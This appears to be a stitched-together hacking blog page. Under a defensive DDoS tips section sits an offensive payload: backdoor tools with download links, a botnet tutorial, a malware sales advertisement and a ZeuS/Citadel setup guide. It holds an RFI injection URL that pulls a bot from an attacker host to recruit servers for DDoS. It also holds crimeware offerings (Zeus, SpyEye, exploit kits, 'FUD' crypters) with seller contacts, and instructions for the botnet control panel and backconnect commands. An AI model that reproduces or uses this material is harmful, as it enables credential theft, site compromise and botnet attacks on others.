Sunday, September 29, 2013

8 Ways To Protect Your Website From DDoS Attack




1. Efficiency
DDoS is a war of attrition: efficient use of resources is a key defence. Applications need to be designed from the ground up with efficiency in mind:

- well architected and designed
- efficient code and algorithms
- proper memory allocation and clean up
- configurable time outs and resource restrictions

====================================

2. Excess Capacity
If your site is running at 90% capacity with normal traffic, it is a sitting duck for a DDoS attack.

The more excess capacity (throughput) you have the better; cloud infrastructure that allows you to dynamically add capacity is ideal.

====================================

3. Testing and Planning
DDoS attacks can be simulated as part of performance testing. Testing helps you to understand how your application bears the stresses of a DDoS, so that you can plan a defence.

====================================

4. Layer 4 Network Equipment
Switches and routers generally have built-in defences for layer 4 attacks.

Effective layer 4 defences include bogus IP filtering, traffic shaping, TCP splicing and rate limiting. Work with your ISP or network equipment vendor to understand the features of your network.

====================================

5. Bandwidth Management
Bandwidth management hardware allows you to classify incoming traffic as priority, regular or dangerous. In the event of a DDoS attack, non-priority requests can be dropped.

====================================

6. Intrusion Detection Systems (IDS)
IDS look for attack patterns in incoming traffic and can drop suspicious packets.

====================================

7. Custom Defence
Many layer 7 attacks require a custom on-the-fly defence. Typically, web developers analyse traffic patterns for irregular:

- IPs
- request signatures
- http headers
- form parameters

Once a pattern is determined, filters can be implemented on the web server to drop matching requests.
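One way to do the traffic analysis described in this section, as an added example that is not part of the original article: it parses constructed access-log lines, flags addresses that exceed a request rate, request signatures that dominate traffic from several sources, and requests with an empty User-Agent header, then builds a drop filter from the result. The thresholds, the sample traffic and the TEST-NET addresses are assumptions.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone

# Combined log format: ip ident user [ts] "METHOD path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.groupdict()
    req["ts"] = datetime.strptime(req["ts"], TS_FMT)
    return req


def signature(req):
    """Request signature: method, path with query string stripped, User-Agent."""
    return (req["method"], req["path"].split("?", 1)[0], req["ua"])


def analyse(lines, window=timedelta(seconds=10), ip_limit=20, sig_share=0.5, min_ips=3):
    """Return (bad_ips, bad_signatures) found in the log lines.

    bad_ips: addresses sending more than ip_limit requests in any `window`,
             or sending requests with no User-Agent header.
    bad_signatures: (method, path, ua) tuples that make up at least sig_share
             of all traffic and come from at least min_ips distinct addresses.
    """
    reqs = sorted(filter(None, map(parse_line, lines)), key=lambda r: r["ts"])
    if not reqs:
        return set(), set()

    # 1. Per-IP request rate: sliding window over each address's timestamps.
    bad_ips = set()
    by_ip = defaultdict(list)
    for r in reqs:
        by_ip[r["ip"]].append(r["ts"])
    for ip, stamps in by_ip.items():
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:
                start += 1
            if end - start + 1 > ip_limit:
                bad_ips.add(ip)
                break

    # 2. Request signatures that dominate traffic and are spread over many sources.
    sig_count = Counter(signature(r) for r in reqs)
    sig_ips = defaultdict(set)
    for r in reqs:
        sig_ips[signature(r)].add(r["ip"])
    bad_sigs = {s for s, n in sig_count.items()
                if n / len(reqs) >= sig_share and len(sig_ips[s]) >= min_ips}

    # 3. Irregular headers: browsers always send a User-Agent; "-" or "" is suspect.
    bad_ips |= {r["ip"] for r in reqs if r["ua"] in ("", "-")}
    return bad_ips, bad_sigs


def make_filter(bad_ips, bad_sigs):
    """Build the web-server side filter: drop a request if its IP or signature matches."""
    def should_drop(req):
        return req["ip"] in bad_ips or signature(req) in bad_sigs
    return should_drop


def build_sample():
    """Constructed sample traffic (not from any real site): two ordinary visitors
    browsing four pages, plus three addresses hammering /login with no User-Agent."""
    t0 = datetime(2013, 9, 29, 12, 0, 0, tzinfo=timezone.utc)
    fmt = '{ip} - - [{ts}] "{m} {p} HTTP/1.1" 200 512 "-" "{ua}"'
    browser = "Mozilla/5.0 (Windows NT 6.1) Firefox/24.0"
    lines = []
    for i, path in enumerate(["/", "/about", "/news", "/contact"]):
        for ip in ("192.0.2.10", "192.0.2.11"):
            ts = (t0 + timedelta(seconds=7 * i)).strftime(TS_FMT)
            lines.append(fmt.format(ip=ip, ts=ts, m="GET", p=path, ua=browser))
    for ip in ("203.0.113.5", "203.0.113.6", "203.0.113.7"):
        for i in range(30):  # 30 POSTs in 6 seconds from each address
            ts = (t0 + timedelta(milliseconds=200 * i)).strftime(TS_FMT)
            lines.append(fmt.format(ip=ip, ts=ts, m="POST", p="/login?r=%d" % i, ua="-"))
    return lines


if __name__ == "__main__":
    bad_ips, bad_sigs = analyse(build_sample())
    print("drop IPs:", sorted(bad_ips))
    print("drop signatures:", sorted(bad_sigs))
```

The resulting filter also drops a previously unseen address that sends the flagged signature, which is what makes signature rules useful against a distributed flood.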

====================================

8. Blackholing and Sinkholing
Severe DDoS attacks may require blackholing: sending all requests to a non-existent server. This brings the website down but relieves the pressure on the server.

Sinkholing sends all requests to a logger that records some statistics and then drops the requests. Sinkholing can help developers establish attack patterns.

====================================

Top Most used Backdoor Programs





Using these programs any noob can remotely access your computer without any authentication and do whatever he wants. I will tell you some of the features; the rest you need to try out and find for yourself. These programs:

=> Work as a key logger.
=> Send any information from the victim's PC to the hacker's PC.
=> Run any program on the victim's PC.
=> Display any violating image on the victim's screen.
=> Open the CD drive of the victim's PC.
=> Open any web page on the victim's screen.
=> Disable any specific key or the whole keyboard.
=> Shut down the victim's PC.
=> Start a song on the victim's PC, etc.

Back Orifice / Back Orifice 2000

Back Orifice is one of the most common backdoor programs, and one of the most deadly. The name may seem like a joke, but the threat is real. Back Orifice was created by the Cult of the Dead Cow group. Back Orifice is an open source program. The main threat of this software is that by making some changes in the code anybody can make it undetectable to the anti-virus program running on the victim's computer. Apart from the strange title, the program usually uses port 31337, a reference to the "leet" phenomenon popular among hackers.

Back Orifice uses a client-server model, where the server runs on the victim and the client on the attacker. What makes Back Orifice so dangerous is that it can install and operate silently. No interaction with the user is required, meaning it could be on your computer right now without you knowing.

Companies such as Symantec have taken steps to protect computers against programs that they consider dangerous. But attacks using Back Orifice 2000 are still increasing. This is due partly to the fact that it is still evolving as open source. As stated in its documentation, the ultimate goal is for the presence of Back Orifice 2000 to be unknown even to those who installed it.

Back Orifice 2000 was developed for Windows 95, Windows 98, Windows NT, Windows 2000 and Windows XP.

Where can I download Back orifice 2000?

Back Orifice 2000 can be downloaded at the following address: http://sourceforge.net/projects/bo2k/

I'm infected! How do I remove it?

Removing Back Orifice 2000 may require that you change registry settings. To remove it in 7 simple steps, refer to the list below.

How do I delete Back Orifice 2000?

1. Click Start > Run, and type "Regedit" (without the quotes).
2. Follow the path below: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
3. Now look in the right-hand box for: "umgr32 = c:\windows\system\umgr32.exe"
4. Right-click on this entry and click Remove. Now restart your computer.
5. After restarting, open only Windows Explorer. Make sure you can see all registered extensions. To do so, select View > Options and configure the appropriate settings.
6. Go to the WINDOWS\SYSTEM directory and find the "umgr32.exe" file.
7. Once you find it, delete it.
8. Exit Windows Explorer and reboot again.

NetBus / Netbus 2.0 Pro

NetBus was created around the same time as Back Orifice, in the late 1990s. NetBus was originally designed as a program to prank friends and family, of course nothing too malicious. However, the program was released in 1998 and is widely used as a backdoor to control computers.

Like Back Orifice, NetBus allows attackers to do virtually anything on the victim's computer. It works well under Windows 9x systems as well as Windows XP. Unlike Back Orifice, the latest version of NetBus is regarded as shareware and is not free. NetBus also implements less stealthy operations, as a direct result of criticism and complaints about abusive use.

Where can I buy and download NetBus?

NetBus can be purchased and downloaded at the following address: http://www.netbus.org/

Ok, I am infected. Now what?

Fortunately, the latest version of NetBus is a valid program. It can be removed just like any other program. Earlier releases of NetBus are a bit trickier, however. If you were not lucky enough to be attacked with the latest version, the removal process is the same as for Back Orifice.

How do I remove NetBus?

1. Click Start > Run, and type "Regedit" (without the quotes).
2. Follow the path below: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
3. Now, in the right-hand box, look for the following: "[Name_of_Server].exe". Of course, you have to find the actual name of this EXE file. Usually this is "Patch.exe" or "SysEdit.exe", but it may vary.
4. Reboot and remove all traces of the actual program that may be left.
5. Additionally, you can install NetBus yourself, and then use its own removal function.

SubSeven / Sub7

SubSeven, or Sub7, was created for the same purpose as NetBus: pranks. Sub7 actually has more support for pranks and has more advanced users. Sub7 is also widely used by script kiddies, although many firewalls and anti-virus programs stop it before initialization.

Since Sub7 has not been supported for several years, the threat is usually very low. Most security programs will have no problem ending Sub7 before it has a chance to start. This shows that keeping security programs up to date is critical, because the threat is still out there.

Nevertheless, it is widely used by those who have physical access to your firewall or security programs. If they have access rights, the tool will work without restrictions.

Where can I buy and download Sub7?

Sub7 is no longer supported, and hence is not available for download on any legitimate websites. If you were to do a Google search, you would find links to download Sub7. However, these are not official sites, and should be considered dubious and dangerous.

Sounds harmless. How do I remove it?

End the following processes through the Task Manager: editserver.exe, subseven.exe
Delete the following files: editserver.exe, subseven.exe, tutorial.txt

Why are these programs absolutely legitimate?

The whole premise behind these programs is that they are designed to help people, not harm them. While some, like NetBus, really were originally created for pranks, they switched routes to avoid legal problems.

These programs claim to be legitimate remote desktop programs, although they are certainly easily put to malicious use. These programs really should be used by IT support or customer support departments. Why all adolescents want to copy these programs is beyond us, but keeping them off your network's computers is a good idea.

The advent of new technology has made these programs in some respects less effective. However, programs such as Back Orifice 2000 are still evolving, so do not be surprised to learn that one is working in the background, waiting for instructions. Since the best defense is a good offense, be sure to keep a sharp eye on what is installed on the network's computers. After all, an ounce of prevention is worth a pound of cure.

Botnet Tutorial


Hello Guys

In this tutorial, I'll introduce how to build a botnet.
But I'm sure some of you have already learned about botnets, so I won't go into details.




There are two main types of botnet.
1. Exe based botnet.
2. Http based botnet.

1. What is an exe based botnet?

As u already know, exe based botnet is very popular in hacking community.
There are so many source codes for the exe based botnets.
They need to compile and build an exe.
(That exe is a client and when the victim run that, his machine or his pc will join a channel of the IRC server)
After you create an exe, pack it, bind it and spread it on the net.
You can spread it by so many ways.
I'll post the exe based botnet video tutorials by watch guard network security later.
In summary, exe based bots are mainly used for windows machines.


2. What is an HTTP based botnet?


Http based bots are mostly php bot and perl bot.
None of them are exe bots.
They are used together with RFI or SQLi attacks.
When a site is backdoored with a shell.
The attacker upload a php and run it.
If so , the hacked site join to the IRC server and that site act as a zombie.
I'll show an example.

http://www.target.com/vul.php?hack_root=www.hacker.com/bot.txt???
It's the same method with RFI exploit.
When you inject the code like above, www.target.com will join to your server.
So, you need to find RFI vulnerable links to get or to collect so many zombies.
But, collecting RFI vulnerable links is not a difficult work.
You can use RFI scanner bots and can get thousand of RFI links.
When you get more than 200 sites, you can DDOS.
In summary, http botnet is mainly used for web servers.
It works on windows and linux server.

Hint : 200 zombies of http botnet may more powerful than 200 zombies of exe botnet.
Reason : The power of botnet depend on the number of IP and the zombie machine.

P.S --- you need to edit the php bot source code.
If somebody here has some problems to build a botnet, PM me.
I'll post in detail later.

Botnet Setups


All Type Of Botnet services are available With Hosting Facilities and Installation facilities

BOTNETS

Version of Ice9

* ice9 1.2.5
* ice9 1.2.6

Versions of zeus

* Zeus v3
* zeus 2.1.0.1
* Zeus 2.0.8.9


versions of spyeye

* SpyEye v_1.3.45
* SpyEye v_1.1.39

IRC BOT'S

* Cyclone
* gBot v1 Builder
* gBot v2 Builder
* Silly Bot 1.4
* Insomnia Builder v2
* Insomnia Builder v1

STEALERS

* CRIMESTEALER
* iStealer 6.3 Legends
* Elite-Stealer 
* Crime24-Stealer
* ISR Stealer 0.4.1

EXPLOITS TOOLKIT

* CRIMEPACK v2
* CRIMEPACK v3
* BLACKHOLE
* PHOENIX EXPLOIT KIT LATEST
* X-Pack 
* Unique Pack
* IcePack-Platinum_Edition
* Bleeding Life v2
* Luiz Eleonore Exp 1.2
* FirePack




JDB's AVAILABLE NOW
FUD 100%


Some pictures of my service (screenshots, not preserved in this copy): Ice9; Zeus; CRIMEPACK; NEW JDB's FUD AVAILABLE (sample one is below, you can check on the specified website); PHOENIX EXPLOIT KIT LATEST; SPYEYE WITH HOSTING FACILITIES; HOSTING FACILITIES; ZEUS INSTALLATION; CRIME STEALER

Contact us at:
skype id : suriya.cyber
yahoo messenger : cybersuriya73@yahoo.com

Saturday, September 28, 2013

Citadel Botnet Installation


Hi Guys




Today I am going to introduce a new botnet called CITADEL ZEUS BOTNET; it is the latest version of ZeuS. Well, you are all aware of ZeuS; if you have any doubt about ZeuS you can check at this link




I will support your CITADEL project at any time and consult on any question about CITADEL.
Anyone interested in private exploits, PM me.

yahoo messenger: cybersuriya@gmail.com
skype: suriya.cyber
gtalk: cybersuriya73@gmail.com



==============
= Contents =
==============

1. Description and facilities. 
2. Setting up the server. 
2.1. HTTP-server. 
2.2. The interpreter PHP. 
2.3. MySQL-server. 
2.4. Control Panel. 
2.4.1. Setting. 
2.4.2. Update. 
2.4.3. File / system / fsarc.php. 
3. Setting Bot. 
4. Working with BackConnect. 

============================== 
= 1. Description and facilities. = 
============================== 
ICE9 - software to steal personal user data from remote Windows systems. In
plain language, a "Trojan", "backdoor", "virus". But the author does not like these words, therefore further in this documentation
he will call this software "Bot".

The bot is fully based on WinAPI interception in user mode (Ring3); this means that the bot does not use
any drivers and does not load anything into Ring0. This feature makes it possible to run the bot even from
a Windows Guest account. Plus, it ensures greater stability and adaptability to
subsequent versions of Windows.

The bot is developed in Visual C++ version 9.0+, with no additional libraries used
such as msvcrt, ATL, MFC, QT, etc. Bot code is written with the following priorities (in descending order):
1. stability (all results of function calls are carefully checked, etc.)
2. size (avoiding duplication of algorithms, repetitive calls, functions, etc.)
3. speed (no instructions of the type while (1 ){..}, for (int i = 0; i

Functions and features of the bot:
1. Sniffer traffic for the protocol TCP. 
1.1. Interception of FTP logins on any port. 
1.2. Interception of POP3 logins on any port. 
1.3. The interception of any data from the traffic (a personal request). 

2. Intercepting HTTP / HTTPS requests to wininet.dll, ie all programs working with this 
library. This includes Internet Explorer (any version), Maxton, etc. 
2.1. Substitution .. 

3. The functions of the server. 
3.1 Socks4/4a/5. 
3.2 BackConnect for any service (RDP, Socks, FTP, etc.) on the infected machine. You can
access a computer that is behind NAT or, for example, one that
is banned from connecting to the internet.
3.3 Getting a screenshot of the screen in real time.
- Do not add --- 


- 2.3. MySQL-server. -- 
---------------------- 
MySQL is required to store all data on the botnet. The recommended version is not lower than 5.1.30; also
bear in mind that the control panel has some problems with older
versions. All control panel tables use MyISAM, so it is important to optimize the
speed of work with this format based on the available server resources.

We recommend the following changes to the MySQL-server setup (my or my.ini): 

max_connections = 2000 # Or higher 

Download MySQL: http://dev.mysql.com/downloads/


On nix systems set the following permissions:
. - 777 
/ system - 777 
/ tmp - 777



ALL FOR EDUCATION PURPOSE ONLY I AM NOT RESPONSE FOR ANY HARM FULL INFECTION OF SYSTEM ETC-


How to Setup Zeus Botnet Installation

I will support your ZeuS project at any time and consult on any question about ZeuS.
Anyone interested in private exploits, PM me.


yahoo messenger: cybersuriya73@yahoo.com.com

skype: suriya.cyber



gtalk: cybersuriya@gmail.com


=======================================================
User's Guide 
*********************************** 

============== 
= Contents = 
============== 

1. Description and facilities. 
2. Setting up the server. 
2.1. HTTP-server. 
2.2. The interpreter PHP. 
2.3. MySQL-server. 
2.4. Control Panel. 
2.4.1. Setting. 
2.4.2. Update. 
2.4.3. File / system / fsarc.php. 
3. Setting Bot. 
4. Working with BackConnect. 
5. History. 
6. F.A.Q. 
7. Myths. 

============================== 
= 1. Description and facilities. = 
============================== 
ZeuS - software to steal personal user data from remote Windows systems. In
plain language, a "Trojan", "backdoor", "virus". But the author does not like these words, therefore further in this documentation
he will call this software "Bot".

The bot is fully based on WinAPI interception in user mode (Ring3); this means that the bot does not use
any drivers and does not load anything into Ring0. This feature makes it possible to run the bot even from
a Windows Guest account. Plus, it ensures greater stability and adaptability to
subsequent versions of Windows.

The bot is developed in Visual C++ version 9.0+, with no additional libraries used
such as msvcrt, ATL, MFC, QT, etc. Bot code is written with the following priorities (in descending order):
1. stability (all results of function calls are carefully checked, etc.)
2. size (avoiding duplication of algorithms, repetitive calls, functions, etc.)
3. speed (no instructions of the type while (1 ){..}, for (int i = 0; i



Functions and features of the bot:
1. Sniffer traffic for the protocol TCP. 
1.1. Interception of FTP logins on any port. 
1.2. Interception of POP3 logins on any port. 
1.3. The interception of any data from the traffic (a personal request). 

2. Intercepting HTTP / HTTPS requests to wininet.dll, ie all programs working with this 
library. This includes Internet Explorer (any version), Maxton, etc. 
2.1. Substitution .. 

3. The functions of the server. 
3.1 Socks4/4a/5. 
3.2 BackConnect for any service (RDP, Socks, FTP, etc.) on the infected machine. You can
access a computer that is behind NAT or, for example, one that
is banned from connecting to the internet.
3.3 Getting a screenshot of the screen in real time.
- Do not add --- 

========================= 
= 2. Setting up the server. = 
========================= 
The server is the central point of control of the botnet; it collects reports from the bots
and distributes commands to the bots. It is not recommended to use "Virtual Hosting" or "VDS", because
as the botnet grows, the load on the server will increase, and this type of hosting quite
quickly exhausts its resources. You need a "Dedicated Server"; the recommended minimum
configuration:

1. 2 GB of RAM.
2. 2x CPU with 2 GHz frequency.
3. SATA hard drive, 7200 rpm or better.

The bot requires an HTTP server with PHP + Zend Optimizer connected, and a MySQL server.

NOTE: For Windows systems it is very important to edit (create) the following registry value:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\MaxUserPort = dword:65534
(decimal)

--------------------- 
- 2.1. HTTP-server. -- 
--------------------- 
As the HTTP server it is recommended to use: for nix systems, Apache from version 2.2; for
Windows systems, IIS from version 6.0. We recommend that you keep the HTTP server on port 80 or 443 (this
has a positive effect on the bots' check-in rate, as providers / proxies can block access to other,
non-standard ports).

Download Apache: http://apache.org/dyn/closer.cgi
Site IIS: http://www.iis.net/

--------------------------- 
- 2.2. The interpreter PHP. -- 
--------------------------- 
The latest version of the control panel is designed for PHP 5.2.6. It is highly recommended to
use a version not lower than this. In extreme cases, not lower than 5.2.

It is important to make the following settings in php.ini: 

safe_mode = Off 
magic_quotes_gpc = Off 
magic_quotes_runtime = Off 
memory_limit = 256M; or higher. 
post_max_size = 100M; or higher. 

and recommended to change the following settings: 

display_errors = Off 

You also need to add Zend Optimizer (script acceleration, and running protected
scripts). We recommend version 3.3.

We do not recommend connecting PHP to the HTTP server via CGI.

Download PHP: http://www.php.net/downloads.php
Download Zend Optimizer: http://www.zend.com/en/products/guard/downloads

---------------------- 
- 2.3. MySQL-server. -- 
---------------------- 
MySQL is required to store all data on the botnet. The recommended version is not lower than 5.1.30; also
bear in mind that the control panel has some problems with older
versions. All control panel tables use MyISAM, so it is important to optimize the
speed of work with this format based on the available server resources.

We recommend the following changes to the MySQL-server setup (my or my.ini): 

max_connections = 2000 # Or higher 

Download MySQL: http://dev.mysql.com/downloads/

--------------------------- 
- 2.4. Control Panel. -- 
--------------------------- 

2.4.1. Setting. 
***************** 
Purpose of files and folders:
/install - the installer.
/system - the system files.
/system/fsarc.php - a script to call an external archiver (section 2.4.3).
/system/config.php - config file.
/theme - the theme files (design); without Zend they can be freely changed.
cp.php - login to the control panel.
gate.php - gate for the bots.
index.php - empty file to prevent listing of files.

The control panel is usually located in the folder [php] in the server distribution. All contents of this
folder need to be uploaded to the server into any directory accessible by HTTP. If you upload through
FTP, upload all files in binary mode.

On nix systems set the following permissions:
. - 777 
/ system - 777 
/ tmp - 777 

For Windows systems:
\system - full write access, and read access only for the user under which access
via HTTP runs. For IIS this is usually IUSR_*.
\tmp - the same as for \system.

Once all files are uploaded, open the installer in a web browser at the URL
http://server/papka/install/index.php. Follow the instructions that appear; in case of
errors during installation (you will be notified in detail), check that all fields are correct
and that the permissions on the folders are set correctly.

After installation, we recommend that you delete the install directory, and rename the files cp.php (entrance to the
panel) and gate.php (gate for the bots) to any names you want (do not change the
extension).

Now you can enter the control panel by typing the URL of the renamed
cp.php file into the browser.

2.4.2. Update. 
****************** 
If you have a new copy of the control panel and want to update an older version, you
should do the following:

1) Copy the files of the new panel over the old ones.
2) Rename the files cp.php and gate.php to the real names you chose during installation
of the old control panel.
3) Just in case, set the directory permissions again in accordance with paragraph 2.4.
4) In a browser, run the installer at the URL http://server/direktoriya/install/index.php, and
follow the instructions that appear. The installer may take a fairly long
time; this is because some tables may be re-written.
5) You can use the new control panel.

2.4.3. File / system / fsarc.php. 
****************************** 
This file contains a function to call an external archiver. At present the archiver
is used only in "Reports :: Search in files" (reports_files), and is called to pack
files and folders into a single archive. By default it is set to the Zip archiver, which is
universal for Windows and nix, so all you have to do is install this
archiver on the system and grant rights to execute it. You can also edit this file to work with
any archiver.

Download Zip: http://www.info-zip.org/Zip.html. 

====================== 
= 3. Setting Bot. = 
====================== 

=========================== 
= 4. Working with BackConnect = 
=========================== 
Working with BackConnect is described by example.

IP BackConnect-server: 192.168.100.1 
Port for the bot: 4500 
Port for the client application: 1080 

1) Run the server application (zsbcs.exe or zsbcs64.exe) on the server has an IP in 
Internet application specifies the port, which is expected to connect from the bot, and the port to 
which will connect the client application. For example zsbcs.exe listen-cp: 1080-bp: 4500, 
where 1080 - the client port 4500 - port to the bot. 

2) The bot must be sent the command bc_add service server_host server_port, where service is a
port number or the name* of the service to which the bot needs to connect.

* currently only supported in the name of socks, which allows you to connect to the built-in 
Socks-bot server. 

server_host - the server on which the server application is running. It can be an IPv4,
IPv6 address or a domain.
server_port - the port specified in the bp option of the server application. In this case, 4500.

Example: bc_add socks 192.168.100.1 4500 - as a result you get the socks, 
bc_add 3389 192.168.100.1 4500 - as a result you get rdp. 

3) Now you need to wait for bot to connect to the server, in this period, any attempt to client 
applications to connect will be ignored (will disconnect the client). Badge 
connect bot will be output to the console server line "Accepted new conection from bot ...". 

4) After connecting the bot, you can work with their client. Ie you just 
connect to the server to the client port (in this case 1080). For example, if you gave 
team socks, a port on the client you will be expected to Socks-server, if port 3389, then 
you connect to 192.168.100:1080 as a normal RDP. 

5) After that, when you do not need BackConnect of the bot for a certain service, you must pay 
click bc_del service server_host server_port, where all the parameters must be identical 
parameters bc_add, which must be removed. You can also use the spec. characters 
'*' And '?'. 

For example: bc_del * * * - deletes all BackConnect'y This Bota. 
bc_del * 192.168 .* * remove all BackConnect'y, connect to the server with IP 192.168 .*. 
bc_del 3389 192.168.100.1 4500 - specifically removes one BackConnect. 

NOTES: 
1) You can specify any number of BackConnect'ov (ie bc_add), but they should not be shared 
combination of IP + Port. But if there is such a combination, will be launched first added. 
2) For each BackConnect'a, you must run a separate server application. 
3) if the connection (drop server drop bot, etc.), bot will repeat the connection 
to the server indefinitely (even after rebooting the PC), until BackConnect will not be removed 
(ie bc_del). 
4) As a service to bc_add, you can use any open port at the address 127.0.0.1. 
5) The server application supports IPv6, but in principle at the present time, this support is not particularly 
relevant. 
6) You can launch the server application under wine. Writing the same elf application is currently not 
planned. 
7) It is recommended to use popular application server ports (80, 8080,
443, etc.) for the bp option, because other ports may be blocked by the bot's provider.
8) Different bots should not be allowed to connect to the same server port at the same time.
9) The method of such a connection might be useful for bots, which are outside the NAT, because sometimes 
Windows firewall or ISP may be blocked from the Internet connection. 

NOTE: This feature is not available in all builds Bot. 

====================== 
= 5. History. = 
====================== 
Conditional tags: [*] - To change. 
[-] - A correction. 
[+] - Add. 

[Version 1.2.0.0, 20.12.2008]
Overall: [*] The documentation will no longer be in a chm file; everything will be written to this file.
[+] The bot is now able to receive commands not only when sending status, but also when sending
files / logs.
[+] Local data, requests to the server and the configuration file are encrypted with an RC4 key of
your choice. [*] Fully updated bot <-> server protocol. Possibly reduced load on the server.

Bot:
[-] Fixed the bug that blocked bots on limited Windows screens.
[*] Written a new PE cryptor; the PE file is now very accurate and most closely simulates the output of MS Linker 9.0.
[*] Updated the build process in the bot builder.
[*] Optimized compression of the configuration file.
[*] New format of the binary configuration file.
[*] Rewritten the process of assembling the binary config file.
[*] Socks and LC are now working on one port.

Control Panel:
[*] The status of the control panel is transferred to BETA.
[*] Changed all MySQL tables.
[*] Started a gradual transfer of the Control Panel to UTF-8 (there may be temporary problems with displaying characters).
[*] Updated geo database.

[Version 1.2.1.0, 30.12.2008] 
Bot: [*] BOFA answers are now sent as BLT_GRABBED_HTTP (was BLT_HTTPS_REQUEST).
[-] Small error when sending reports. 
[-] The size of the report could not exceed ~550 characters.
[-] Error present since the beginning of the bot: a low timeout for sending POST requests,
resulting in blocked sending of long (more than ~1 MB) reports on slow
(unstable) connections; as a theoretical consequence, the bot stopped sending
reports altogether.

Overall: 
[+] For records of type BLT_HTTP_REQUEST and BLT_HTTPS_REQUEST, the field SBCID_PATH_SOURCE
(path_source in the table) now has the URL path added.

Control Panel: [*] Updated redir.php. 

[Version 1.2.2.0, 11.03.2009] 
Bot:
[-] Fixed a bug in HTTP injects that existed in all versions of the bot. When
wininet.dll was used in asynchronous mode, the synchronization of threads
generated by wininet.dll was lost, with the result that, under certain conditions,
an exception occurred.
[+] When an HTTP inject is applied, the files in the local cache are now also changed.
Without this refinement HTTP injects could not always be activated.
[+] Reduced the size of the PE file.

[Version 1.2.3.0, 28.03.2009] 
Bot:
[-] Minor bug in the cryptor, thanks to the valiant so-called analysts from Avira.

Overall: [*] Changed the protocol for distributing commands to bots.

Control Panel:
[*] Completely rewritten Control Panel.
[*] Design rewritten to XHTML 1.0 Strict (does not work in IE).
[*] The bot is now again able to receive commands only when sending a report on its online status (load was too high).
[*] Updated geo database.

[Version 1.2.4.0, 02.04.2009] 
Bot:
[+] When using HTTP, the User-Agent header is now read from Internet Explorer, rather than
being a constant as before. Theoretically, because of the constant User-Agent, requests
could be blocked by providers or fall under suspicion.

Control Panel: 
[-] Fixed a bug displaying records containing characters 0-31 and 127-159. 

============= 
= 6. F.A.Q. = 
============= 
Q: What do the version numbers mean?
A: a.b.c.d
a - a complete change of the bot.
b - major changes that cause complete or partial incompatibility with previous
versions.
c - error corrections, refinements, added features.
d - the number of the antivirus clean-up for the current version a.b.c

Q: How is the Bot ID generated?
A: Bot ID consists of two parts: %name%_%number%, where name is the computer name (the result of
GetComputerName), and number is a certain number generated on the basis of some unique operating system data.

Q: Why is the traffic encrypted using symmetric encryption (RC4) and not asymmetric (RSA)?
A: Because using complex algorithms makes no sense; encryption is needed only to hide the
traffic. The only plus of RSA is that, without knowing the key held in the Control Panel, there would be no
ability to emulate its answers. And what is the point of defending against that (from a global
point of view)?

Q: I damaged the tables / files of the panel, what should I do?
A: Follow the instructions specified in paragraph 2.5.

===========
= 7. Myths =
===========
M: ZeuS uses a DLL to work.
A: False. There is only one executable PE file (exe). There have never been dll, sys, etc. files, and there are
unlikely ever to be. This myth arose because some versions of the bot
used files with such extensions to store the configuration.

M: ZeuS uses COM (BHO) to intercept Internet Explorer.
A: False. It always uses WinAPI interception of wininet.dll for this.
=======================================================